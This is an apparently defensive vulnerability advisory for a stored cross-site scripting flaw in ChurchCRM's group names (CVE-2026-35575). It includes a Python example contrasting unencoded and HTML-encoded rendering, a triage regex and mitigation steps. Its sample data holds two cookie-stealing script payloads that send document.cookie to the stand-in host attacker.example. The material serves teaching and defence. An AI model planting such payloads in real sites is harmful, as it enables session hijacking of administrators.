Cross-site scripting in ChurchCRM - CVE-2026-35575
Published: May 5, 2026


Vulnerability identifier: #VU129700
CSH Severity: Low
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/U:Clear
CVE-ID: CVE-2026-35575
CWE-ID: CWE-79
Exploitation vector: Remote access
Exploit availability: No public exploit available
Vendor: ChurchCRM
Affected software: ChurchCRM

Detailed vulnerability description

The vulnerability allows a remote user to execute arbitrary JavaScript in an administrator's browser and steal the administrator's session cookies.

The vulnerability exists due to insufficient sanitization of user-supplied data in the admin panel's group-creation feature: a group name is stored and later rendered to administrators without proper HTML output encoding. A remote user with an account that is allowed to create groups (low privileges, CVSS PR:L) can set a group name containing malicious JavaScript. The payload is persistent (stored cross-site scripting, CWE-79) and executes in the browser of any administrator who opens a page that displays the crafted group name, allowing the attacker to steal the administrator's session cookies.

User interaction is required: the payload only runs when an administrator views the page containing the crafted group name (CVSS UI:P).
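The following is an added example, not code from ChurchCRM or from this advisory. It shows the CWE-79 pattern behind this class of bug next to its fix: a stored group name interpolated into HTML unencoded, the same name passed through HTML entity encoding, and a small triage scan an administrator could run over exported group names to spot a payload that was stored before the update was applied. The `<td class="group-name">` markup, the `SAMPLE_GROUP_NAMES` list and the `attacker.example` host are assumptions made for illustration; ChurchCRM's actual templates are not reproduced here.

```python
"""Stored XSS through a group name: vulnerable vs. encoded rendering, plus a
triage scan over stored names. Added example; this is not ChurchCRM code."""
import html
import re

# Constructed sample data (not taken from ChurchCRM or the advisory). The last
# two entries are the kind of payload a low-privileged account could submit.
SAMPLE_GROUP_NAMES = [
    "Youth Choir",
    "Ushers & Greeters",
    "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>",
    "Bible Study\" onmouseover=\"fetch('https://attacker.example/'+document.cookie)",
]

# Triage pattern: raw angle brackets or an inline event-handler attribute.
# It is for finding payloads that are already stored, not an input filter;
# the actual fix is output encoding, as render_safe() shows.
SUSPICIOUS = re.compile(r"[<>]|\bon\w+\s*=", re.IGNORECASE)


def render_vulnerable(name: str) -> str:
    """Interpolates the stored name straight into HTML (the CWE-79 pattern).

    A name of '<script>...</script>' is emitted as live markup, so the script
    runs in whichever administrator's browser loads the page.
    """
    return f'<td class="group-name">{name}</td>'  # hypothetical markup


def render_safe(name: str) -> str:
    """Encodes the name for an HTML text context before interpolation.

    html.escape(quote=True) turns < > & " ' into entities, so the browser
    shows the payload as text instead of parsing it as markup.
    """
    return f'<td class="group-name">{html.escape(name, quote=True)}</td>'


def triage_stored_names(names: list[str]) -> list[str]:
    """Returns the stored names that warrant manual review and, if malicious,
    investigation of the account that created them."""
    return [n for n in names if SUSPICIOUS.search(n)]


if __name__ == "__main__":
    for name in SAMPLE_GROUP_NAMES:
        print("vulnerable:", render_vulnerable(name))
        print("safe:      ", render_safe(name))
    print("review these stored names:", triage_stored_names(SAMPLE_GROUP_NAMES))
```

The encoding belongs at the point of output, in the template, rather than on input: a name such as "Ushers & Greeters" is legitimate data and must be stored as typed, and it is the HTML context that decides which characters are dangerous.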


How to mitigate CVE-2026-35575

Install the security update from the vendor's website. This advisory does not name the fixed release, so check the vendor's release notes for the version that addresses CVE-2026-35575. Until the update is applied, limit group creation to trusted accounts, since a low-privileged account is enough to store the payload, and review existing group names for HTML markup or event-handler attributes, as any malicious group was created by an account that should be investigated. Marking the session cookie HttpOnly prevents injected script from reading it through document.cookie, but does not stop other actions the script can take in the administrator's session, so it is defense in depth rather than a fix.

Sources